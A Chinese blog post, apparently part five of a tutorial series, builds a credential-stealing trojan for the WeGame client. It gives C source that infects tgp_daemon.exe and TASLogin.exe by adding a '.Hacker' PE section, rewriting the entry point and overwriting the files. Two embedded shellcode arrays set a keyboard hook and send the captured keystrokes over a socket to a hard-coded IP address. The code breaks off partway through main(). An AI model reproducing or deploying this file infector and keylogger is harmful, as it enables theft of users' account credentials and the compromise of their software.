欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

盗号木马之旅(五)

程序员文章站 2022-05-27 15:48:29
...

目标:

      实现把我们在  WeGame盗号木马之旅(三) 中实现的机器码注入到目标EXE中,并修改相关结构。即完成InfectiveVirus.exe。

 

实现:

      下面上一张图,形象的解释我们怎么感染目标EXE:

      首先我们打开目标EXE,CreateFile,读到内存。

盗号木马之旅(五)

 然后在内存修改相关PE结构参数和注入代码:

盗号木马之旅(五)

最后写回覆盖原来的EXE即可:

盗号木马之旅(五)

 打开和写回很简单,就是一般的文件操作而已。关键在于怎么修改PE结构。具体细节请读者参考这几篇文章(http://www.cnblogs.com/wumac/p/5272846.html)(https://www.cnblogs.com/wumac/p/5274559.html)。读者需要有相关PE结构知识才行。下面简单说明一下我们需要改什么:

      一、新建一个节,我把他取名.Hacker,同时设置一下里面的一些数据

      二、修改PE头中节的数量

      三、修改ImageSize大小,即PE文件加到内存以后的大小

      四、修改入口点地址

      五、尾部开辟0X2000大小的空间放机器码和参数

 

下面上代码:

#define WIN32_LEAN_AND_MEAN
#include<windows.h>
#include<tchar.h>
#include<stdio.h>
#include<Winsock2.h>

#pragma comment(lib,"WS2_32.lib")

char cBuffer[48] = { 0 };//0
char* pUser32 = "C:\\Windows\\System32\\user32.dll";//30
char* pWS2_32 = "C:\\Windows\\System32\\Ws2_32.dll";//60
char* pLoadLibrary = "LoadLibraryA";//90
char* pGetProcAddress = "GetProcAddress";//C0
char* pGetCurrentThreadId = "GetCurrentThreadId";//F0
char* pSetWindowsHookEx = "SetWindowsHookExA";//120
char* pCreateThread = "CreateThread";//150
char* pCallNextHookEx = "CallNextHookEx";//180
char* pWSAStartup = "WSAStartup";//1B0
char* psocket = "socket";//1E0
char* phtons = "htons";//210
char* pIP = "192.168.1.3";//240
char* pinet_addr = "inet_addr";//270
char* pconnect = "connect";//2A0
char* psend = "send";//2D0
char* pclosesocket = "closesocket";//300
char* pWSACleanup = "WSACleanup";//330
int iNamesNum;//360
HHOOK gHook;//364
PBYTE pKernalBaseMem = NULL;//368
HANDLE hUser32Handle = NULL;//36C
HANDLE hWS2_32Handle = NULL;//370
WORD* pNameOrdinalsTable;//374
DWORD* pAddressOfName;//378
DWORD* pAddressOfFunction;//37C
DWORD dwLoadLibrary = NULL;//380
DWORD dwGetProcAddress = NULL;//384
PROC procGetCurrentThreadId = NULL;//388
PROC procSetWindowsHookEx = NULL;//38C
PROC procCreateThread = NULL;//390
PROC procCallNextHookEx = NULL;//394
PROC procWSAStartup = NULL;//398
PROC procsocket = NULL;//39C
PROC prochtons = NULL;//3A0
PROC procinet_addr = NULL;//3A4
PROC procconnect = NULL;//3A8
PROC procsend = NULL;//3AC
PROC procclosesocket = NULL;//3B0
PROC procWSACleanup = NULL;//3B4
//////////////
WCHAR pLinkName[] = L"\\\\.\\*_LINK";//3B8
char pCreateFile[] = "CreateFileW";//3E8
char pDeviceIoControl[] = "DeviceIoControl";//418
PROC procCreateFile = NULL;//448
PROC procDeviceIoControl = NULL;//44C
int temp;//450


//注入代码(tgp_daemon.exe)
char shellcode[] = {
	0x64,0x8B,0x05,0x30,0x00,0x00,0x00,0x8B,0x40,0x0C,0x8B,0x40,0x0C,0x8B,0x00,0x8B,
	0x00,0x8B,0x40,0x18,0x89,0x05,0x68,0x13,0x57,0x00,0x8B,0x40,0x3C,0x8B,0x1D,0x68,
	0x13,0x57,0x00,0x03,0xC3,0x03,0x58,0x78,0x8B,0x43,0x14,0x89,0x05,0x60,0x13,0x57,
	0x00,0x8B,0x0D,0x68,0x13,0x57,0x00,0x03,0x4B,0x24,0x89,0x0D,0x74,0x13,0x57,0x00,
	0x8B,0x0D,0x68,0x13,0x57,0x00,0x03,0x4B,0x20,0x89,0x0D,0x78,0x13,0x57,0x00,0x8B,
	0x0D,0x68,0x13,0x57,0x00,0x03,0x4B,0x1C,0x89,0x0D,0x7C,0x13,0x57,0x00,0x56,0x57,
	0xC7,0xC2,0x00,0x00,0x00,0x00,0x8B,0x3D,0x78,0x13,0x57,0x00,0x8B,0x35,0x68,0x13,
	0x57,0x00,0x03,0x34,0x97,0xC7,0xC7,0x90,0x10,0x57,0x00,0xC7,0xC3,0x00,0x00,0x00,
	0x00,0xC7,0xC1,0x00,0x00,0x00,0x00,0x8A,0x24,0x33,0x8A,0x04,0x3B,0x3A,0xE0,0x75,
	0x29,0x43,0x83,0xFB,0x0D,0x0F,0x85,0xEC,0xFF,0xFF,0xFF,0x8B,0x0D,0x74,0x13,0x57,
	0x00,0x0F,0xB7,0x0C,0x51,0x8B,0x3D,0x7C,0x13,0x57,0x00,0x8B,0x3C,0x8F,0x89,0x3D,
	0x80,0x13,0x57,0x00,0xC7,0xC1,0x00,0x00,0x00,0x00,0xC7,0xC7,0xC0,0x10,0x57,0x00,
	0x8A,0x24,0x31,0x8A,0x04,0x39,0x3A,0xE0,0x75,0x23,0x41,0x83,0xF9,0x0E,0x0F,0x85,
	0xE6,0xFF,0xFF,0xFF,0x8B,0x35,0x74,0x13,0x57,0x00,0x0F,0xB7,0x34,0x56,0x8B,0x3D,
	0x7C,0x13,0x57,0x00,0x8B,0x3C,0xB7,0x89,0x3D,0x84,0x13,0x57,0x00,0x8B,0x05,0x80,
	0x13,0x57,0x00,0x83,0xF8,0x00,0x74,0x0D,0x8B,0x05,0x84,0x13,0x57,0x00,0x83,0xF8,
	0x00,0x74,0x02,0xEB,0x0D,0x42,0x3B,0x15,0x60,0x13,0x57,0x00,0x0F,0x85,0x54,0xFF,
	0xFF,0xFF,0x5F,0x5E,0x8B,0x05,0x68,0x13,0x57,0x00,0x8B,0x1D,0x80,0x13,0x57,0x00,
	0x03,0xD8,0x89,0x1D,0x80,0x13,0x57,0x00,0x8B,0x1D,0x84,0x13,0x57,0x00,0x03,0xD8,
	0x89,0x1D,0x84,0x13,0x57,0x00,0x68,0x30,0x10,0x57,0x00,0xFF,0x15,0x80,0x13,0x57,
	0x00,0x89,0x05,0x6C,0x13,0x57,0x00,0x68,0x60,0x10,0x57,0x00,0xFF,0x15,0x80,0x13,
	0x57,0x00,0x89,0x05,0x70,0x13,0x57,0x00,0x68,0xF0,0x10,0x57,0x00,0xFF,0x35,0x68,
	0x13,0x57,0x00,0xFF,0x15,0x84,0x13,0x57,0x00,0x89,0x05,0x88,0x13,0x57,0x00,0x68,
	0x20,0x11,0x57,0x00,0xFF,0x35,0x6C,0x13,0x57,0x00,0xFF,0x15,0x84,0x13,0x57,0x00,
	0x89,0x05,0x8C,0x13,0x57,0x00,0x68,0x50,0x11,0x57,0x00,0xFF,0x35,0x68,0x13,0x57,
	0x00,0xFF,0x15,0x84,0x13,0x57,0x00,0x89,0x05,0x90,0x13,0x57,0x00,0x68,0x80,0x11,
	0x57,0x00,0xFF,0x35,0x6C,0x13,0x57,0x00,0xFF,0x15,0x84,0x13,0x57,0x00,0x89,0x05,
	0x94,0x13,0x57,0x00,0x68,0xB0,0x11,0x57,0x00,0xFF,0x35,0x70,0x13,0x57,0x00,0xFF,
	0x15,0x84,0x13,0x57,0x00,0x89,0x05,0x98,0x13,0x57,0x00,0x68,0xE0,0x11,0x57,0x00,
	0xFF,0x35,0x70,0x13,0x57,0x00,0xFF,0x15,0x84,0x13,0x57,0x00,0x89,0x05,0x9C,0x13,
	0x57,0x00,0x68,0x10,0x12,0x57,0x00,0xFF,0x35,0x70,0x13,0x57,0x00,0xFF,0x15,0x84,
	0x13,0x57,0x00,0x89,0x05,0xA0,0x13,0x57,0x00,0x68,0x70,0x12,0x57,0x00,0xFF,0x35,
	0x70,0x13,0x57,0x00,0xFF,0x15,0x84,0x13,0x57,0x00,0x89,0x05,0xA4,0x13,0x57,0x00,
	0x68,0xA0,0x12,0x57,0x00,0xFF,0x35,0x70,0x13,0x57,0x00,0xFF,0x15,0x84,0x13,0x57,
	0x00,0x89,0x05,0xA8,0x13,0x57,0x00,0x68,0xD0,0x12,0x57,0x00,0xFF,0x35,0x70,0x13,
	0x57,0x00,0xFF,0x15,0x84,0x13,0x57,0x00,0x89,0x05,0xAC,0x13,0x57,0x00,0x68,0x00,
	0x13,0x57,0x00,0xFF,0x35,0x70,0x13,0x57,0x00,0xFF,0x15,0x84,0x13,0x57,0x00,0x89,
	0x05,0xB0,0x13,0x57,0x00,0x68,0x30,0x13,0x57,0x00,0xFF,0x35,0x70,0x13,0x57,0x00,
	0xFF,0x15,0x84,0x13,0x57,0x00,0x89,0x05,0xB4,0x13,0x57,0x00,0xFF,0x15,0x88,0x13,
	0x57,0x00,0x50,0x6A,0x00,0x68,0x00,0x03,0x57,0x00,0x6A,0x03,0xFF,0x15,0x8C,0x13,
	0x57,0x00,0xE9,0x21,0xAA,0xF0,0xFF,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x55,0x8B,0xEC,0x81,0xEC,0xC0,0x00,0x00,0x00,0x53,0x56,0x57,0x8D,0xBD,0x40,0xFF,
	0xFF,0xFF,0xC7,0xC1,0x30,0x00,0x00,0x00,0xC7,0xC0,0xCC,0xCC,0xCC,0xCC,0xF3,0xAB,
	0x8B,0x45,0x10,0x8B,0x58,0x04,0x81,0xFB,0x02,0x01,0x00,0x00,0x75,0x23,0x8A,0x40,
	0x08,0x88,0x05,0x00,0x10,0x57,0x00,0x6A,0x00,0x6A,0x00,0x8D,0x05,0x00,0x10,0x57,
	0x00,0x50,0x68,0xC0,0x03,0x57,0x00,0x6A,0x00,0x6A,0x00,0xFF,0x15,0x90,0x13,0x57,
	0x00,0xFF,0x75,0x10,0xFF,0x75,0x0C,0xFF,0x75,0x08,0xFF,0x35,0x64,0x13,0x57,0x00,
	0xFF,0x15,0x94,0x13,0x57,0x00,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,0x0C,0x00,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x55,0x8B,0xEC,0x83,0xEC,0x40,0x53,0x56,0x57,0x8D,0x85,0x30,0xFE,0xFF,0xFF,0x50,
	0x68,0x02,0x02,0x00,0x00,0xFF,0x15,0x98,0x13,0x57,0x00,0x6A,0x00,0x6A,0x01,0x6A,
	0x02,0xFF,0x15,0x9C,0x13,0x57,0x00,0x89,0x45,0xF8,0xC7,0xC0,0x02,0x00,0x00,0x00,
	0x66,0x89,0x45,0xE0,0x68,0x0A,0x1A,0x00,0x00,0xFF,0x15,0xA0,0x13,0x57,0x00,0x66,
	0x89,0x45,0xE2,0x68,0x40,0x12,0x57,0x00,0xFF,0x15,0xA4,0x13,0x57,0x00,0x89,0x45,
	0xE4,0x6A,0x10,0x8D,0x45,0xE0,0x50,0x8B,0x45,0xF8,0x50,0xFF,0x15,0xA8,0x13,0x57,
	0x00,0x83,0xF8,0x00,0x75,0x11,0x6A,0x00,0x6A,0x01,0xFF,0x75,0x08,0x8B,0x45,0xF8,
	0x50,0xFF,0x15,0xAC,0x13,0x57,0x00,0x8B,0x45,0xF8,0x50,0xFF,0x15,0xB0,0x13,0x57,
	0x00,0xFF,0x15,0xB4,0x13,0x57,0x00,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,0x04,0x00
};
//注入代码(TASLogin.exe)
char shellcode2[] = {
	0x64,0x8B,0x05,0x30,0x00,0x00,0x00,0x8B,0x40,0x0C,0x8B,0x40,0x0C,0x8B,0x00,0x8B,
	0x00,0x8B,0x40,0x18,0x89,0x05,0x68,0x13,0x4F,0x00,0x8B,0x40,0x3C,0x8B,0x1D,0x68,
	0x13,0x4F,0x00,0x03,0xC3,0x03,0x58,0x78,0x8B,0x43,0x14,0x89,0x05,0x60,0x13,0x4F,
	0x00,0x8B,0x0D,0x68,0x13,0x4F,0x00,0x03,0x4B,0x24,0x89,0x0D,0x74,0x13,0x4F,0x00,
	0x8B,0x0D,0x68,0x13,0x4F,0x00,0x03,0x4B,0x20,0x89,0x0D,0x78,0x13,0x4F,0x00,0x8B,
	0x0D,0x68,0x13,0x4F,0x00,0x03,0x4B,0x1C,0x89,0x0D,0x7C,0x13,0x4F,0x00,0x56,0x57,
	0xC7,0xC2,0x00,0x00,0x00,0x00,0x8B,0x3D,0x78,0x13,0x4F,0x00,0x8B,0x35,0x68,0x13,
	0x4F,0x00,0x03,0x34,0x97,0xC7,0xC7,0x90,0x10,0x4F,0x00,0xC7,0xC3,0x00,0x00,0x00,
	0x00,0xC7,0xC1,0x00,0x00,0x00,0x00,0x8A,0x24,0x33,0x8A,0x04,0x3B,0x3A,0xE0,0x75,
	0x29,0x43,0x83,0xFB,0x0D,0x0F,0x85,0xEC,0xFF,0xFF,0xFF,0x8B,0x0D,0x74,0x13,0x4F,
	0x00,0x0F,0xB7,0x0C,0x51,0x8B,0x3D,0x7C,0x13,0x4F,0x00,0x8B,0x3C,0x8F,0x89,0x3D,
	0x80,0x13,0x4F,0x00,0xC7,0xC1,0x00,0x00,0x00,0x00,0xC7,0xC7,0xC0,0x10,0x4F,0x00,
	0x8A,0x24,0x31,0x8A,0x04,0x39,0x3A,0xE0,0x75,0x23,0x41,0x83,0xF9,0x0E,0x0F,0x85,
	0xE6,0xFF,0xFF,0xFF,0x8B,0x35,0x74,0x13,0x4F,0x00,0x0F,0xB7,0x34,0x56,0x8B,0x3D,
	0x7C,0x13,0x4F,0x00,0x8B,0x3C,0xB7,0x89,0x3D,0x84,0x13,0x4F,0x00,0x8B,0x05,0x80,
	0x13,0x4F,0x00,0x83,0xF8,0x00,0x74,0x0D,0x8B,0x05,0x84,0x13,0x4F,0x00,0x83,0xF8,
	0x00,0x74,0x02,0xEB,0x0D,0x42,0x3B,0x15,0x60,0x13,0x4F,0x00,0x0F,0x85,0x54,0xFF,
	0xFF,0xFF,0x5F,0x5E,0x8B,0x05,0x68,0x13,0x4F,0x00,0x8B,0x1D,0x80,0x13,0x4F,0x00,
	0x03,0xD8,0x89,0x1D,0x80,0x13,0x4F,0x00,0x8B,0x1D,0x84,0x13,0x4F,0x00,0x03,0xD8,
	0x89,0x1D,0x84,0x13,0x4F,0x00,0x68,0x30,0x10,0x4F,0x00,0xFF,0x15,0x80,0x13,0x4F,
	0x00,0x89,0x05,0x6C,0x13,0x4F,0x00,0x68,0x60,0x10,0x4F,0x00,0xFF,0x15,0x80,0x13,
	0x4F,0x00,0x89,0x05,0x70,0x13,0x4F,0x00,0x68,0xF0,0x10,0x4F,0x00,0xFF,0x35,0x68,
	0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x88,0x13,0x4F,0x00,0x68,
	0x20,0x11,0x4F,0x00,0xFF,0x35,0x6C,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,
	0x89,0x05,0x8C,0x13,0x4F,0x00,0x68,0x50,0x11,0x4F,0x00,0xFF,0x35,0x68,0x13,0x4F,
	0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x90,0x13,0x4F,0x00,0x68,0x80,0x11,
	0x4F,0x00,0xFF,0x35,0x6C,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,
	0x94,0x13,0x4F,0x00,0x68,0xB0,0x11,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,
	0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x98,0x13,0x4F,0x00,0x68,0xE0,0x11,0x4F,0x00,
	0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x9C,0x13,
	0x4F,0x00,0x68,0x10,0x12,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,
	0x13,0x4F,0x00,0x89,0x05,0xA0,0x13,0x4F,0x00,0x68,0x70,0x12,0x4F,0x00,0xFF,0x35,
	0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0xA4,0x13,0x4F,0x00,
	0x68,0xA0,0x12,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,
	0x00,0x89,0x05,0xA8,0x13,0x4F,0x00,0x68,0xD0,0x12,0x4F,0x00,0xFF,0x35,0x70,0x13,
	0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0xAC,0x13,0x4F,0x00,0x68,0x00,
	0x13,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,
	0x05,0xB0,0x13,0x4F,0x00,0x68,0x30,0x13,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,
	0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0xB4,0x13,0x4F,0x00,0x68,0xE8,0x13,0x4F,
	0x00,0xFF,0x35,0x68,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x48,
	0x14,0x4F,0x00,0x68,0x18,0x14,0x4F,0x00,0xFF,0x35,0x68,0x13,0x4F,0x00,0xFF,0x15,
	0x84,0x13,0x4F,0x00,0x89,0x05,0x4C,0x14,0x4F,0x00,0xFF,0x15,0x88,0x13,0x4F,0x00,
	0x50,0x6A,0x00,0x68,0x00,0x03,0x4F,0x00,0x6A,0x03,0xFF,0x15,0x8C,0x13,0x4F,0x00,
	0x89,0x05,0x64,0x13,0x4F,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0x68,0x80,0x04,0x4F,
	0x00,0x6A,0x00,0x6A,0x00,0xFF,0x15,0x90,0x13,0x4F,0x00,0xE9,0x78,0xFE,0xF2,0xFF,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x55,0x8B,0xEC,0x81,0xEC,0xC0,0x00,0x00,0x00,0x53,0x56,0x57,0x8D,0xBD,0x40,0xFF,
	0xFF,0xFF,0xC7,0xC1,0x30,0x00,0x00,0x00,0xC7,0xC0,0xCC,0xCC,0xCC,0xCC,0xF3,0xAB,
	0x8B,0x45,0x10,0x8B,0x58,0x04,0x81,0xFB,0x02,0x01,0x00,0x00,0x75,0x23,0x8A,0x40,
	0x08,0x88,0x05,0x00,0x10,0x4F,0x00,0x6A,0x00,0x6A,0x00,0x8D,0x05,0x00,0x10,0x4F,
	0x00,0x50,0x68,0xC0,0x03,0x4F,0x00,0x6A,0x00,0x6A,0x00,0xFF,0x15,0x90,0x13,0x4F,
	0x00,0x8B,0x45,0x10,0x8B,0x58,0x04,0x81,0xFB,0x01,0x02,0x00,0x00,0x75,0x15,0x6A,
	0x00,0x6A,0x00,0x6A,0x00,0x68,0x80,0x04,0x4F,0x00,0x6A,0x00,0x6A,0x00,0xFF,0x15,
	0x90,0x13,0x4F,0x00,0xFF,0x75,0x10,0xFF,0x75,0x0C,0xFF,0x75,0x08,0xFF,0x35,0x64,
	0x13,0x4F,0x00,0xFF,0x15,0x94,0x13,0x4F,0x00,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,
	0x0C,0x00,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x55,0x8B,0xEC,0x83,0xEC,0x40,0x53,0x56,0x57,0x8D,0x85,0x30,0xFE,0xFF,0xFF,0x50,
	0x68,0x02,0x02,0x00,0x00,0xFF,0x15,0x98,0x13,0x4F,0x00,0x6A,0x00,0x6A,0x01,0x6A,
	0x02,0xFF,0x15,0x9C,0x13,0x4F,0x00,0x89,0x45,0xF8,0xC7,0xC0,0x02,0x00,0x00,0x00,
	0x66,0x89,0x45,0xE0,0x68,0x0B,0x1A,0x00,0x00,0xFF,0x15,0xA0,0x13,0x4F,0x00,0x66,
	0x89,0x45,0xE2,0x68,0x40,0x12,0x4F,0x00,0xFF,0x15,0xA4,0x13,0x4F,0x00,0x89,0x45,
	0xE4,0x6A,0x10,0x8D,0x45,0xE0,0x50,0x8B,0x45,0xF8,0x50,0xFF,0x15,0xA8,0x13,0x4F,
	0x00,0x83,0xF8,0x00,0x75,0x11,0x6A,0x00,0x6A,0x01,0xFF,0x75,0x08,0x8B,0x45,0xF8,
	0x50,0xFF,0x15,0xAC,0x13,0x4F,0x00,0x8B,0x45,0xF8,0x50,0xFF,0x15,0xB0,0x13,0x4F,
	0x00,0xFF,0x15,0xB4,0x13,0x4F,0x00,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,0x04,0x00,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x55,0x8B,0xEC,0x81,0xEC,0xC0,0x00,0x00,0x00,0x53,0x56,0x57,0x6A,0x00,0x68,0x80,
	0x00,0x00,0x00,0x6A,0x03,0x6A,0x00,0x6A,0x03,0x68,0x00,0x00,0x00,0xC0,0x68,0xB8,
	0x13,0x4F,0x00,0xFF,0x15,0x48,0x14,0x4F,0x00,0x6A,0x00,0x68,0x54,0x14,0x4F,0x00,
	0x6A,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0x50,0xFF,0x15,0x4C,0x14,0x4F,
	0x00,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,0x04,0x00,0x90,0x90,0x90,0x90,0x90,0x90
};


typedef struct RemoteParameter
{
	char c[18][48];
	DWORD p[22];
	char cc[3][48];
	DWORD pp[3];
};

void main() {
	TCHAR* fileName[2];
	fileName[0] = _T("F:\\WeGame\\tgp_daemon.exe");
	fileName[1] = _T("F:\\WeGame\\tenprotect\\TASLogin.exe");
	//fileName[0] = _T("C:\\Users\\a\\Desktop\\WeGame\\tgp_daemon.exe");
	//fileName[1] = _T("C:\\Users\\a\\Desktop\\WeGame\\tenprotect\\TASLogin.exe");
	for (int i = 0; i < 2; i++) {
		DWORD dwApplySize = 0x2000;//需要开辟的代码和参数空间大小
		HANDLE hFile = CreateFile(fileName[i], GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, 0);
		if (hFile == INVALID_HANDLE_VALUE || hFile == NULL) {
			printf("无法打开文件!");
			return;
		}
		DWORD dwFileSize = GetFileSize(hFile, NULL);
		if (dwFileSize == 0xffffffff) {
			printf("读取文件大小失败!");
			CloseHandle(hFile);
			return;
		}
		LPVOID pFileMem = GlobalAlloc(GMEM_FIXED | GMEM_ZEROINIT, dwFileSize + dwApplySize);//开辟新的内存
		if (pFileMem == NULL) {
			printf("开辟内存失败!");
			CloseHandle(hFile);
			return;
		}
		DWORD dwReadFactSize = 0;
		BOOL bRead = ReadFile(hFile, pFileMem, dwFileSize, &dwReadFactSize, NULL);
		if (!bRead || dwReadFactSize != dwFileSize) {
			printf("文件载入内存出错!");
			CloseHandle(hFile);
			GlobalFree(pFileMem);
			return;
		}
		//设置新的节
		PIMAGE_NT_HEADERS pPeHeader = (PIMAGE_NT_HEADERS)((PBYTE)pFileMem + ((PIMAGE_DOS_HEADER)pFileMem)->e_lfanew);
		PIMAGE_SECTION_HEADER pSectionHeader = (PIMAGE_SECTION_HEADER)((PBYTE)&pPeHeader->OptionalHeader + pPeHeader->FileHeader.SizeOfOptionalHeader);
		int iSectionNum = pPeHeader->FileHeader.NumberOfSections;//原来的节数目
		IMAGE_SECTION_HEADER addSectionHeader;//新的节
		addSectionHeader.Name[0] = '.';
		addSectionHeader.Name[1] = 'H';
		addSectionHeader.Name[2] = 'a';
		addSectionHeader.Name[3] = 'c';
		addSectionHeader.Name[4] = 'k';
		addSectionHeader.Name[5] = 'e';
		addSectionHeader.Name[6] = 'r';
		addSectionHeader.Name[7] = '\0';//设置节的名字
		addSectionHeader.Misc.VirtualSize = dwApplySize;//节的虚拟内存大小
		addSectionHeader.VirtualAddress = pPeHeader->OptionalHeader.SizeOfImage;//虚拟地址起点
		addSectionHeader.SizeOfRawData = dwApplySize;//节的文件内大小
		addSectionHeader.PointerToRawData = pSectionHeader[iSectionNum - 1].PointerToRawData + pSectionHeader[iSectionNum - 1].SizeOfRawData;//文件地址起点
		addSectionHeader.PointerToRelocations = 0;//这些参数不重要
		addSectionHeader.PointerToLinenumbers = 0;
		addSectionHeader.NumberOfRelocations = 0;
		addSectionHeader.PointerToLinenumbers = 0;
		addSectionHeader.Characteristics = 0xF000000F;//设置这片内存的属性,需要有执行代码和读写的权限才行
		memcpy((PBYTE)(&pSectionHeader[iSectionNum - 1]) + sizeof(IMAGE_SECTION_HEADER), (PBYTE)&addSectionHeader, sizeof(IMAGE_SECTION_HEADER));
		pPeHeader->FileHeader.NumberOfSections++;//增加节的数目
		pPeHeader->OptionalHeader.DllCharacteristics = 0x0000;
		pPeHeader->OptionalHeader.AddressOfEntryPoint = pPeHeader->OptionalHeader.SizeOfImage;//设置新的入口点
		pPeHeader->OptionalHeader.SizeOfImage += 0x2000;//增加总的内存文件大小0x2000
		//初始化参数,参数即需要在我们代码里面使用的一些字符串和用来保存的变量
		struct RemoteParameter remoteParameter;
		memset(&remoteParameter, 0, sizeof(remoteParameter));
		memcpy(remoteParameter.c[1], pUser32, strlen(pUser32));
		memcpy(remoteParameter.c[2], pWS2_32, strlen(pWS2_32));
		memcpy(remoteParameter.c[3], pLoadLibrary, strlen(pLoadLibrary));
		memcpy(remoteParameter.c[4], pGetProcAddress, strlen(pGetProcAddress));
		memcpy(remoteParameter.c[5], pGetCurrentThreadId, strlen(pGetCurrentThreadId));
		memcpy(remoteParameter.c[6], pSetWindowsHookEx, strlen(pSetWindowsHookEx));
		memcpy(remoteParameter.c[7], pCreateThread, strlen(pCreateThread));
		memcpy(remoteParameter.c[8], pCallNextHookEx, strlen(pCallNextHookEx));
		memcpy(remoteParameter.c[9], pWSAStartup, strlen(pWSAStartup));
		memcpy(remoteParameter.c[10], psocket, strlen(psocket));
		memcpy(remoteParameter.c[11], phtons, strlen(phtons));
		memcpy(remoteParameter.c[12], pIP, strlen(pIP));
		memcpy(remoteParameter.c[13], pinet_addr, strlen(pinet_addr));
		memcpy(remoteParameter.c[14], pconnect, strlen(pconnect));
		memcpy(remoteParameter.c[15], psend, strlen(psend));
		memcpy(remoteParameter.c[16], pclosesocket, strlen(pclosesocket));
		memcpy(remoteParameter.c[17], pWSACleanup, strlen(pWSACleanup));
		memcpy(remoteParameter.cc[0], pLinkName, sizeof(pLinkName));
		memcpy(remoteParameter.cc[1], pCreateFile, sizeof(pCreateFile));
		memcpy(remoteParameter.cc[2], pDeviceIoControl, sizeof(pDeviceIoControl));
		//把参数结构体写入目标EXE文件
		memcpy((PBYTE)pFileMem + addSectionHeader.PointerToRawData + 0x1000, (PBYTE)&remoteParameter, sizeof(remoteParameter));
		//把注入的机器码(注入代码)写入目标EXE
		if (i == 0) {
			memcpy((PBYTE)pFileMem + addSectionHeader.PointerToRawData, shellcode, sizeof(shellcode));//注入到tgp_daemon.exe
		}
		else
		{
			memcpy((PBYTE)pFileMem + addSectionHeader.PointerToRawData, shellcode2, sizeof(shellcode2));//注入到TASLogin.exe
		}
		//生成感染的程序,把修改后的文件从内存中取出写入原来文件地址,覆盖原来目标EXE文件
		DWORD dwWriteFact = 0;
		DWORD dwPointer = SetFilePointer(hFile, 0, NULL, FILE_BEGIN);
		if (dwPointer == 0xffffffff) {
			printf("文件指针移到头出错!");
			CloseHandle(hFile);
			GlobalFree(pFileMem);
			return;
		}
